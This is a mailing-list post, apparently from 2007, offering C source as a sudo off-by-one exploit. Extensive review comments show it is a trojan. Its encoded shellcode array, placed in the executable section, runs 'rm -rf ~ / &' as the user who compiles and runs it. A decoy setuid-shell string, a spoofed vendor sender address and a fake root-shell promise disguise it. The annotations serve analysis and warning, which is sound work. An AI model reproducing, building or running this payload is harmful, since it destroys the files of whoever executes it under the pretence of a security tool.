[Beyond Security] New sudo off-by-one poc exploit.
From: Beyond Security <beyondsequritee () yahoo com>
Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
/*
 * off by one ebp overwrite in sudo prompt parsing function
 * discovered by beyond security in 2007, thx ge
 *
 * to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 * please use responsibly! a patch has already been sent
 * upstream and a fix will be included in the next sudo release
 *
 * NOTE(review): DO NOT BUILD OR RUN THIS FILE.  It is not a sudo exploit; it
 * is a trojan aimed at whoever runs it.  The byte string the file calls
 * "shellcode" disassembles (i386) to execve("/bin/sh", {"/bin/sh", "-c",
 * "rm -rf ~ / &", NULL}, {NULL}) followed by exit(1): the four dwords it
 * pushes are NOT-encoded and decode to "rm -rf ~ / &" (see the annotated
 * listing on the array below).  The readable "cp -p /bin/sh /tmp/.beyond;
 * chmod 4755 ..." tail sits after the NUL-terminated "-c", is never
 * referenced by any instruction, and only makes the payload look like a
 * setuid-shell dropper.  Nothing here can run code inside the sudo process:
 * the "return addresses" exp() sprays point into THIS binary (see get_sp).
 * The only place the payload can execute is this process, as the user who
 * typed ./sobo.  The posting's From: header is a yahoo.com address that
 * merely resembles the company name; do not treat it as vendor-attributed.
 */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>

/* sudo "-p" prompt.  Ends in a lone '%' after an escaped backslash, presumably
 * meant to look like an escape-parsing trigger.  Must stay byte-for-byte. */
#define SPROMPT "%u@%h> \\%"
/* Obfuscation: every use of "shellcode" is really the global array esp[] below,
 * and exp()'s third parameter is renamed to esp by this macro, shadowing the
 * global inside exp().  The asm string in get_sp() is not touched by the macro
 * and refers to the global symbol. */
#define shellcode esp
/* 246 does not fit in a signed char -- see the note on exp(). */
#define RETS_NUM 246
#define NOPS_NUM 116

/* e.s.p release */
/* NOTE(review): "esp" is the payload, not a register.  section(".text") places
 * the array in the executable code section so it can be jumped into.
 * Annotated disassembly (i386):
 *   eb 3e                 jmp  +0x3e             -> the call near the end
 *   5b                    pop  ebx               ebx = "/bin/sh\0-c\0..."
 *   31 c0 50              xor eax,eax; push eax  NULL  (envp[0])
 *   54 5a                 push esp; pop edx      edx = envp
 *   83 ec 64              sub  esp,0x64
 *   68 ff ff ff ff        push 0xffffffff        ~ -> 0x00000000 terminator
 *   68 df d0 df d9        push 0xd9dfd0df        ~ -> " / &"
 *   68 8d 99 df 81        push 0x81df998d        ~ -> "rf ~"
 *   68 8d 92 df d2        push 0xd2df928d        ~ -> "rm -"
 *   54 5e                 push esp; pop esi      esi = encoded string
 *   f7 16 / f7 56 04 / f7 56 08 / f7 56 0c
 *                         not dword [esi+0..12]  -> "rm -rf ~ / &\0"
 *   83 c4 74              add  esp,0x74          back to just below NULL
 *   56                    push esi               argv[2] = "rm -rf ~ / &"
 *   8d 73 08 56           lea esi,[ebx+8]; push esi   argv[1] = "-c"
 *   53                    push ebx               argv[0] = "/bin/sh"
 *   54 59                 push esp; pop ecx      ecx = argv
 *   b0 0b cd 80           mov al,11; int 0x80    execve(ebx, ecx, edx)
 *   31 c0 40 eb f9        xor eax,eax; inc eax; jmp int 0x80   exit(1)
 *   e8 bd ff ff ff        call -0x43             -> pop ebx above
 *   2f 62 69 6e 2f 73 68 00    "/bin/sh\0"
 *   2d 63 00                   "-c\0"
 *   "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;"   never referenced
 */
char esp[] __attribute__ ((section(".text")))
    = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
      "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
      "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
      "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
      "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
      "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
      "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
      "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

/* Write val over buff, one unsigned long at a time, for
 * size / sizeof(unsigned long) words; the remainder bytes are left untouched.
 * On i386 that is 116 -> 116 bytes for the nop sled and 246 -> 244 bytes for
 * the address spray.  On an LP64 build val is only 32 bits wide, so every
 * word would carry four zero bytes -- the program only makes sense on i386. */
void fill (char *buff, int size, unsigned long val)
{
    unsigned long *ptr = (unsigned long *) buff;
    for (size /= sizeof (unsigned long); size > 0; size--)
        *ptr++ = val;
}

/* NOTE(review): not "get stack pointer".  In GCC/AT&T syntax "lea esp, %eax"
 * loads the address of the SYMBOL esp -- the payload array above -- into eax;
 * the shellcode/esp macro does not rewrite identifiers inside an asm string.
 * There is no return statement (undefined behaviour); the caller presumably
 * receives whatever is left in eax, i.e. that address, with unoptimized GCC
 * on i386.  Every "return address" exp() sprays is therefore a pointer into
 * this binary's own .text, which is meaningless in a separate sudo process. */
unsigned long get_sp (void)
{
    __asm__ ("lea esp, %eax");
}

/* Builds the string handed to sudo -p: SPROMPT, a nop sled, the payload bytes
 * and rets_nums bytes of get_sp()'s value.  After macro expansion the third
 * parameter is named esp and shadows the global; strlen() on it stops at the
 * first zero byte of the payload (the NUL after "/bin/sh").
 *
 * NOTE(review): the count parameters are plain char.  RETS_NUM (246) does not
 * fit a signed char, the x86 default, so alloca() is asked for
 * (size_t)(char)246 -- a negative value converted to size_t -- while the
 * (unsigned char) cast hands fill() the full 246.  fill() then writes 244
 * bytes of payload address starting at whatever alloca returned.  That is the
 * real "ebp overwrite": the likely intent is to clobber this function's own
 * saved ebp / return address so that returning from exp() jumps into esp[]
 * and runs "rm -rf ~ / &" as the current user, before execl() is reached.
 * Whether it lands exactly is compiler- and frame-layout-dependent; treat the
 * file as hostile either way.
 *
 * Further defects, deliberately left untouched: neither alloca'd buffer is
 * NUL-terminated, so the "%s" conversions on nops and rets read until they
 * happen to meet a zero byte; the size check runs after the writes it is
 * meant to guard; size is a signed int compared against size_t; fd 2 is
 * closed before the error is written to stderr, so no diagnostic can ever
 * appear; "exp" shadows the C library function of that name. */
char *exp (char nops_nums, char rets_nums, char *shellcode)
{
    int size = strlen (SPROMPT) + nops_nums + rets_nums + strlen (shellcode);
    unsigned char *nops = alloca (nops_nums);
    unsigned char *rets = alloca (rets_nums);
    unsigned long ret = get_sp ();
    static char exp_buffer [8192];

    /* ensure isatty() fails */
    /* NOTE(review): this also hides every message this program or sudo could print. */
    close (0);
    close (1);
    close (2);

    fill (nops, (unsigned char) nops_nums, 0x90909090);
    fill (rets, (unsigned char) rets_nums, ret);

    if (size > sizeof (exp_buffer)) {
        fprintf (stderr, "buffer is too small\n");
        return NULL;
    }

    snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s", SPROMPT, nops, shellcode, rets);
    return exp_buffer;
}

/* NOTE(review): argc/argv are swapped in name only; neither is used.  exp()
 * runs first, and if the frame overwrite described there succeeds the payload
 * executes here and execl() is never reached.  Otherwise sudo is started with
 * fds 0-2 closed and a several-hundred-byte "-p" prompt; if exp() returned
 * NULL the NULL lands in the middle of the execl() argument list and
 * truncates it after "-p".  execl()'s return value is unchecked, so failure
 * is silent.  The closing comment promises a root shell at /tmp/.beyond, a
 * path that no code in this file or in the payload ever creates. */
int main(int argv, char *argc[])
{
    char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
    execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL);
    /* shellroot should await you @ "HISTFILE=/dev/null /tmp/.beyond -p" */
    return 0;
}